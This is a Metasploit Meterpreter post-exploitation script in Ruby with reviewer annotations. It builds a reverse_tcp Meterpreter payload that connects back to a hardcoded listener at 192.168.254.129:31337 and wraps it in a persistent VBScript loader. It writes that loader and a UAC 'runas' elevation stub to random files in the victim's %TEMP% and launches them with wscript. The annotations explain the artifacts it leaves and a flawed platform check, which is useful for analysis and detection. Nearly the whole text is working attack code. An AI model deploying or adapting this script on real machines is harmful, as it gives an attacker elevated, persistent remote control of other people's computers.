- # $Id: killuac.rb spudgunman $
- #
- # Meterpreter script to prompt for permissions to run in elevated mode and then call home
- # some code pulled from the persistence.rb script
- # Script by Kelly Keeton<kellykeeton [at] hotmail>
- # Version: 0.5
- #
- # Reader's summary (review note): the script writes two VBScript files with
- # random names into the session's %TEMP%. The first re-launches itself through
- # Shell.Application.ShellExecute with the "runas" verb, which surfaces a UAC
- # consent prompt to the logged-on user (this is an elevation *prompt*, not a
- # silent bypass); once re-run with an argument it starts the second file, which
- # carries the generated reverse_tcp payload. The two .vbs files in %TEMP%, the
- # UAC prompt for wscript.exe, and the wscript.exe process chain are the
- # host-side artifacts this leaves behind.
- #
- # Default parameters
- #
- # Listener host/port the generated payload connects back to, and the payload
- # module name handed to the framework below.
- rhost = "192.168.254.129"
- rport = 31337
- payload = "windows/meterpreter/reverse_tcp"
- ##
- # Remote %TEMP% resolved through the Meterpreter filesystem API; both dropped
- # files are placed here. rand(8)+6 gives a 6..13-character random name.
- tempdir = client.fs.file.expand_path("%TEMP%")
- payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
- # NOTE(review): String#scan returns an Array, and an empty Array is truthy in
- # Ruby, so `not platform` is never true if client.platform is a String — this
- # guard does not actually reject non-Windows sessions.
- platform = client.platform.scan(/(win32|win64)/)
- unsupported if not platform
- print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
- # Build the payload via the framework, then wrap the raw stage in a VBScript
- # loader. :persist and :delay are passed straight to Msf::Util::EXE;
- # presumably they make the VBS re-run the payload on a 5-second cycle —
- # confirm against that helper rather than this call site.
- pay = client.framework.payloads.create("#{payload}")
- pay.datastore['LHOST'] = rhost
- pay.datastore['LPORT'] = rport
- raw = pay.generate
- payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
- print_status("Payload script is #{payloadvbs.length} bytes long")
- # Elevation stub (a VBScript string literal; `#{payloadfile}` is interpolated
- # on the `tmp =` line). With no arguments it ShellExecutes its own path with
- # the "runas" verb, which raises the UAC consent prompt; when re-invoked with
- # the "noloop" argument it runs the payload .vbs with wscript. objFSO,
- # strPath and strFolder are computed but never used.
- uacvbs = "
- If WScript.Arguments.length =0 Then
- Set objShell = CreateObject(\"Shell.Application\")
- objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
- Else
- Set objShell = WScript.CreateObject(\"WScript.Shell\")
- Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
- strPath = Wscript.ScriptFullName
- Set objFile = objFSO.GetFile(strPath)
- strFolder = objFSO.GetParentFolderName(objFile)
- tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
- objShell.Run(tmp)
- End If"
- #
- # Upload to the filesystem
- #
- # Second random .vbs name in %TEMP%. The stub is written before the payload
- # file it references; each handle is closed explicitly since the Meterpreter
- # file object is not used in block form here.
- elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
- print_status("UAC elevation script written to #{elevationfile}")
- fd = client.fs.file.new(elevationfile, "wb")
- fd.write(uacvbs)
- fd.close
- print_status("payload script written to #{payloadfile}")
- fd = client.fs.file.new(payloadfile, "wb")
- fd.write(payloadvbs)
- fd.close
- #
- # Execute the script
- #
- # Starts the stub with wscript on the session host; 'Hidden' => false means
- # the process gets a visible window. The local `proc` shadows Kernel#proc for
- # the rest of the script — harmless here, but worth renaming.
- proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
- print_status("Script executed with PID #{proc.pid}")
- #EOF